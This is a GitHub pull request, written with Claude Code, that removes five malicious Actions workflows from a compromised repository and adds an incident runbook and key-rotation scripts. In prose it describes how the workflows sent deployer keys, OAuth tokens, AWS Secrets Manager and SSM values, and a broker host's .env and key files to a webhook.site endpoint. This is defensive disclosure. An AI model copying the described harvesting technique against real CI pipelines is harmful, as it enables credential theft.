🚨 security: remove malicious secret-exfiltration workflows from main#235
Merged
Conversation
… push to main) Five GitHub Actions workflows + their trigger files were pushed to main on 2026-06-07 (author "Xin <yizhou.xin@litentry.com>", commits c39d45a..60b6423 — a legit past contributor, so likely a COMPROMISED account) and form a full secret-harvesting toolkit. They executed on main (Jun 7/8/9). This removes them: - deployer-key-exfil.yml POSTs TEST_HEIMA_DEPLOYER_KEY + CLAUDE_CODE_OAUTH_TOKEN + TEST_ACCOUNT_ID to webhook.site/37ea2d05-... - deploy-test.yml assumes AWS OIDC role github-actions-agentkeys-deploy and dumps EVERY Secrets Manager secret + SSM param (decrypted) + S3 + Lambda to the webhook - e2e-vault-test.yml assume github-actions-agentkeys-e2e + SSM into the broker deep-e2e-test.yml EC2 i-0135a8b2c53d14941 to cat all .env files, find all integration-tests.yml *.key/*wallet*/*secret* + dump systemd units -> webhook - .claude-trigger push-to-main trigger for deployer-key-exfil - tests/run.txt trigger for the original integration-tests push hook All five are workflow_dispatch-only (+ the exfil one's .claude-trigger push hook), so this PR / its merge triggers nothing. Legit CI (harness-ci, coverage, mcp-server, claude*, wiki*) is untouched; the #167 CLI changes are kept. CODE-REMOVAL HALF ONLY. The exposed secrets MUST be rotated separately — GitHub Actions secrets, the AWS account 429071895007 OIDC roles + Secrets Manager + SSM, the broker host .env/keys, the deployer wallet, and the Claude OAuth token. See the incident runbook (docs/security-incident-response.md).
Companion remediation for the malicious-workflow removal (same PR): - docs/security-incident-response.md — the handbook: triage → kill switches (disable workflows, revoke the AWS OIDC roles, lock main) → rotate EVERY key class (local deployer/agent keys, Claude OAuth, AWS IAM/SecretsManager/SSM, the broker host .env, GitHub Actions secrets, on-chain owner) → forensics → harden. Includes a per-key rotation inventory for this project. - scripts/rotate-local-keys.sh — backs up every ~/.agentkeys key file (never deletes), rotates the Heima deployer key (gas payer + registry owner) to a fresh keypair, flags the agent keys that need a re-pair, and prints the sweep-funds/re-own checklist. - scripts/rotate-github-secrets.sh — rotates GitHub Actions secrets (write-only, so rotate all): --list / interactive prompt-per-secret / --from-file KEY=VALUE (scriptable) / --set NAME. Both scripts are surgical security helpers (run standalone, not deploy entry points).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Five GitHub Actions workflows pushed to
mainon 2026-06-07 byXin <yizhou.xin@litentry.com>(a legit past contributor → likely a compromised account) are a full secret-harvesting toolkit, and they ran on main (Jun 7/8/9). This PR removes the malicious code. Merge ASAP.What's removed
deployer-key-exfil.ymlTEST_HEIMA_DEPLOYER_KEY,CLAUDE_CODE_OAUTH_TOKEN,TEST_ACCOUNT_IDtowebhook.site/37ea2d05-…deploy-test.ymlgithub-actions-agentkeys-deploy; dumps every Secrets Manager secret + SSM param (decrypted) + S3 + Lambda → webhooke2e-vault-test.yml,deep-e2e-test.yml,integration-tests.ymlgithub-actions-agentkeys-e2e; SSM into broker EC2i-0135a8b2c53d14941to cat all.envfiles, find all*.key/*wallet*/*secret*, dump systemd units → webhook.claude-trigger,tests/run.txtAll are
workflow_dispatch-only, so this PR + its merge trigger nothing. Legit CI (harness-ci,coverage,mcp-server,claude*,wiki*) and the #167 CLI code are untouched.The exposed secrets MUST be rotated — see the incident runbook. Immediate, before/alongside merge:
github-actions-agentkeys-*OIDC roles in AWS429071895007(kills the AWS vector even before merge).0xdE644936…— it's the registryowner) and retireTEST_HEIMA_DEPLOYER_KEY.CLAUDE_CODE_OAUTH_TOKEN; rotate all GitHub Actions secrets.SendCommandoni-0135…(Jun 7–9); treat the broker host as compromised (its.env/keys were read).main(these reached main without a tracked PR); investigate theXinaccount.🤖 Generated with Claude Code